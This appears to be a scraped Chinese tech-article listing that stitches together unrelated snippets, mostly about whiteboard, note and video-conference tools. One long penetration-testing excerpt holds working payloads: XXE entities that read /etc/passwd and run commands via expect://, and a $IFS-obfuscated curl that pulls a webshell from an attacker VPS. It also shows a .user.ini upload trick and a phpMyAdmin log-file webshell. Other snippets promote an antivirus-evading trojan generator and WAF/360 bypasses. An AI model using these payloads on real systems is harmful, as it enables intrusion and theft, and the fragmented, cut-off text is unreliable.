1、联想语音 这是一个实时音视频翻译的chrome浏览器插件。 它可以实时把没有中文字幕的英文视频转成带中文字幕的视频。 对于想学习英文,又想看中文字幕的伙伴就非常适用了。 传送门:https://c
声明:公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系开白!
我从 2017 进入大屏触摸这个行业,主要是做桌面软件这一块。在大屏交互平板这个行业里面的还能看的上去的应用,都是使用 WPF 做的。本文就来和大家聊聊在触摸屏应用开发的时候需要了解的软硬件知识。阅读本文你将能大概了解这个行业的一点知识
因为浏览器同源策略的关系,只有同协议、域名、端口的页面才能进行交互,否则会被浏览器拒绝。现有两个页面,分别为111.example.com和example.com,两个页面是不同的域名,不能进行交互,但是可以在111.example.com使用以下代码设置同域,这样即可实现一个跨子域的交互。
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持 #防护绕过 #内网安全 #实战案例#其他笔记 #资源分享 #MSF 目标站点:http://icfcs.******-u.ac.jp 服务器IP:210.***.***.76(
今天在“搞基大队”的群里看到@六八表哥发的这篇9CCMS代码审计笔记,审计的版本为1.89,经六表哥同意转发至该公众号,该文章比较适合新手学习。
Date/time:2013年,这次的目标就是这台服务器权限,接下来这篇文章会写出在此次渗透中遇到的一些阻碍分析及最终拿到服务器权限的过程。其实这次的渗透应该来说还是挺简单的,都是常规的渗透思路,这次的渗透再次证明了细心、耐心和经验的重要性!
希沃白板是依靠云来实现同步编辑的功能,默认的编辑功能需要在有网络的情况下,才能很好的进行。如果我的网络断了,或进入了没有网络的无网环境,因为没法登录希沃白板的原因,无法编辑我的课件。本文来告诉大家简单的解决方法,通过希沃白板免登陆插件,实现免登陆进入希沃白板的编辑界面,编辑本地的课件
本文主要基于 Websocket、Canvas、Webman、HTML5 CSS 等技术实现一个共享白板原型,支持在多个桌面浏览器之间共享一个无限大小、任意缩放的多人实时协作白板,并实时同步绘画、涂鸦。通过 Canvas 渲染画板、产生涂鸦数据,然后通过Websocket实现客户端与服务器的双向通信,并在多个设备之间实时同步涂鸦数据。
使用希沃白板的手机端或微信小程序端播放视频时,会受到手机和微信浏览器的限制,能播放的视频格式有限,请在制作课件时转换好视频格式才进行直播等
前几天群里有个老哥私聊我问了个问题,phpStudy搭建的Web环境,在已拿到的Webshell中执行命令时被360拦截了,问我该如何绕过?
本文介绍基于AvaSpec-ULS2048x64光纤光谱仪测定植被、土壤等地物高光谱曲线的方法。
笔记软件哪家强?这是经久不衰的问题。在各种回答中,难免对不同软件进行对比。事实上,已有的各种笔记软件各具特色,或多或少都有自己的用户群体。适合用户需要的笔记软件便是好的产品。
学习内容来自“慕课网” 百度地图sdk下载 http://developer.baidu.com/ http://bbs.lbsyun.baidu.com/forum.php?mod=viewthre
@Zack 师傅写的一款红队专用免杀木马生成器,采用 PEM 加密动态嵌入 XOR 的方式生成木马,生成木马可以自定义名称和ICO图标。
360webscan, WAF绕过
在工作和学习过程中,通过可视化的图形,有助于清晰高效地表达我们的灵感、想法、思想。 工欲善其事,必先利其器。今天推荐一款简单、好用、强大、高颜值、性价比高的制图工具 —— VisionOn.
几年前的时候,视频会议系统还是政府和一些大企业的“专属”,需要专线、整套服务器和专业视讯终端,价格往往在几十万到上百万不等,而且系统复杂,维护成本高,让大多数中小企业望而却步。
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
OneNote 的强大与自由,很大程度上便是由类似白板的画布体验所赋予的。那么,推荐你试用 Heptabase.
APP 启动图,对于大家来说一定不陌生,它除了加载广告等信息,还有一个作用就是让APP有时间后台加载资源并渲染界面,以便启动图结束后给你展现的是一个渲染好的界面,提升体验。对于 SPA 的 Web 应用程序来说,一般也会有一个启动页,因为 SAP 应用程序第一次加载的时候,会加载很多资源,就可能会造成第一次打开白屏时间比较长,这个时候就可以做一个启动页面,等资源加载完成,页面渲染好以后关闭启动页面,给予用户更好的体验。
思维导图从上个世纪九十年代传入中国大陆。从此之后,基于思维导图理念的各种产品如雨后春笋般涌现。在这些产品中,既有基于思维导图理念的专业思维导图工具,比如 MindMaster,也有与思维导图相关的流程图工具,比如 Processon(这类产品一般都囊括了思维导图)。此外,一些云笔记软件也内置了思维导图功能,比如印象笔记。在这些百花齐放的思维导图工具中,具体应该怎么选择呢?
1.3、XXE相关技巧 1.3.1、XXE载荷构技巧 使用seclists的XXE-Fuzzing.txt的第9行,做一个简单改造即可使用。对比如下: 改造前: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 改造后: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> XXE-Fuzzing.txt的路径:SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后,再加上回显位置即可成功利用,完整载荷示例: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <name> <email> &foo; </email> </name> 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://id" >]> <name> <email> &foo; </email> </name> getshell则是命令执行的变种,通过上传webshell来。 利用前提:知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上,直接寄。 1)使用python托管webshell python -m http.server 8088 2)下载webshell <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://curl$IFS'vps_addr:port/111.php'$IFS-o$IFS'222.php'" >]> <name> <email> &foo; </email> </name> 此处webshell下载解析: curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代,没啥好说的,常规思路。 下载url不能带协议 下载url用单引号包裹,如果是-o方式,保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传 这个跟.htaccess差不多,.user.ini是php给用户的自定义配置文件,可将指定文件按照php脚本文件的形式解析。 介绍:https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程: 1)上传.user.ini filename:.user.ini Content-type:image/jpeg 文件正文: GIF89a auto_prepend_file = aaa.jpg 2)上传webshell filename: aaa.jpg Content-type:image/jpeg 文件正文: GIF89a <?php @eval($_POST[22]);?> # 可替换为其他webshell 1.5、盲注分析 导出数据包: 文件——导出分组解析结果——为纯文本 通过notepad++解码: 提取所有注入数据包,此处使用notepad++中的标记功能,查找模式设置为正则表达式。 提取出来以后,找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。 找到所有数据后,用英文的逗号隔开,然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马 前提:知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "<?php @eval($_POST[22]);?>" web根目
信创是现阶段国家发展的重要战略之一,面对这一趋势,所有的软件应用只有支持信创国产化的基础软硬件设施,在未来才不会被淘汰。那么,如何可以使用C#来实现支持信创环境的视频会议系统吗?答案是肯定的。
WBO是一个自由和开源的在线协作白板。它允许多个用户同时在一个虚拟的大型白板上画图。该白板对所有线上用户实时更新,并且状态始终保持。它可以用于许多不同的目的,包括艺术、娱乐、设计和教学,使用起来也非常有趣。同时,WBO支持公共模式和私有模式,既可以让所有的访问者一起绘制,也可以几个好友创建一个私密共享的白板。下面是公共白板的截图,所有打开这个公共白板的人都可以实时看到别人的绘制成功。
office word文档、pdf文档、powerpoint幻灯片是非常常用的文档类型,在现实中经常有需求需要将它们转换成图片 -- 即将word、pdf、ppt文档的每一页转换成一张对应的图片,就像先把这些文档打印出来,然后再扫描成图片一样。所以,类似这种将word、pdf、ppt转换为图片的工具,一般又称之为“电子扫描器”,很高端的名字!
跟腾讯云了解到windows服务器vnc分辨率是可以调多档的,分辨率越高,母机开销越大,母机默认分辨率没调太高是考虑到母机稳定性和大多数客户都是远程来使用机器,直接用vnc的少,所以没有全量多档vnc。vnc多档分辨率暂时由白名单控制。
有些软件,比如税务软件使用时提示是虚拟机就无法进行下一步了,加个子用户级别的白名单(hide_virtual_user),开任何白名单都需要时间生效,建议开白后等十几分钟再用这个子用户买的机器就绕过软件关于是否虚拟机的检测了,但即便绕过,毕竟还是不支持二次虚拟化,那些需要二次虚拟化才能正常运行的软件即便想办法安装上了也是会出现不稳定的情况。
可以开启屏幕分享这个桌面(摄像头+白板画面),然后旁路直播屏幕分享的流,也可以实现这个需求
WBO在线协作白板是一个自由和开源的在线协作白板,允许多个用户同时在一个虚拟的大型白板上画图。该白板对所有线上用户实时更新,并且状态始终保持。它可以用于许多不同的目的,包括艺术、娱乐、设计和教学,使用起来也非常有趣。
2021 年 12 月末,我在微信里面读了 Alan (詹雨安,Heptabase 开发者)的文章,立即对更名不久的 Heptabase 来了兴趣。
为什么整理这篇文章?因为个人感觉在后渗透中是否能够执行命令是至关重要的一步,所以想着将以前在实战中搜集整理的不能执行命令的常见原因和一些解决方法分享给大家。
Excalidraw 是一款非常轻量的在线白板工具,可以直接在浏览器打开,轻松绘制具有手绘风格的架构图,如果你日常有画架构图,流程图,泳道图,记录一些自己的思想,甚至是简单的原型图,都可以使用它,今天推荐 Excalidraw 的主要原因是非常美观好看,并且有在线各种素材库选用,可以作为 ProcessOn 备用方案,本人自己两者都在使用,因为 ProcessOn 个人版有文件数量限制,往往不够用,那么临时要画图的话可以考虑今天这款开源手绘风格画图白板,最重要的是它是一个开源项目,当然官方也推出了商业版本 Excalidraw+ ,作为个人免费开源版完全够用了。
介绍:提供 20+ 插件 1000+ 功能用于扩展各平台 OneNote (Windows, MAC, Android)。其中包括批量处理器、提醒工具、思维导图、搜索工具栏强化、表格强化等插件。
尽管 Workflowy 后面的不少大纲编辑器。比如,Dynalist 允许将任何节点切换为待办列表、支持 LaTeX 、支持文章模式等新的特性。Workflowy 还是以其纯粹轻便、简约不简单等功能吸引了不少用户。Workflowy 的界面设计十分优雅,编辑器流畅,新增加的看板模式极大提高了组织信息的能力。
静电说:Figma目前已经成为越来越多设计师关注的焦点。而在2021 Config大会上, Figma CEO Dylan 公布了一款新的白板类产品,目前正在Beta中。现在大家可以免费使用,它的名字叫FigJam。
笔者昨天遇到个问题,有用户反馈在iOS 10.3.1的手机上,有个网页打开白屏。但是问题是笔者手头都没有10.x版本的手机,所以想安装模拟器来尝试复现。
QA(我):这个页面打开白屏了,前端开发你看下,抓紧给我改(做测试就是要硬气一点)
该文档只作为功能实践,让读者对trtc直播,页面渲染,以及云直播有个大致直观的了解,不作为生产环境使用。
有很多时候,单纯截图/拍照难以说清楚,录成视频又不方便在各种平台上传播,这时就需要做动图了(GIF)。
某外部大客户购买了腾讯云ES集群,因自身资源评估,需要进行集群降配。该集群包含数据节点、专用主节点,都需要进行缩容。
想了解更多内容,可以近一步阅读我另外一篇文章 Heptabase:面向未来的知识操作系统
前几天在修复留言日期显示错误的问题时,突然觉得可以在这个位置集成一下访客信息,因为见到过不少博客的留言板都有了类似的功能。经过搜索、测试并筛选,最终选定了 Show UserAgent 这款插件。在本地测试了一下,感觉还不错! 一、强迫症 在我熟悉了 WordPress 插件机制后,我总是强迫症的想将插件修改为代码集成。实际上插件和代码的差别只在于代码不需要用到一些钩子动作(hook action)和选项数据(option data)。很多人说插件用多了会拖慢速度,没错是有这么回事,但是如果你把同样数量的插
平时小俊白板用的挺多的,前两天在学校就想着有没有一个轻量化的在线白板(?于是小俊搜寻了一番,还真找到一个名字叫 Whiteboard 的基于 MIT 许可开源的一个项目,安装体验一番之后,个人感觉很不错,推荐给大家,出一期教程教大家如何部署这款程序。
白板的一个共同的特点就是无边,上下左右可以无限扩展,没有边际,其他的则各有侧重点,有的支持良好的协作、有的支持多种白板元素,从功能上来说,我认为可以分为两类:
在社会发高速发展的今天,越来越多的人加入了在线办公的大军中,所以就有很多的在线办公难题需要解决,比如多人在线协作等等,今天我就为大家带来6款多人协作办公软件的测试,接下来请往下看。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
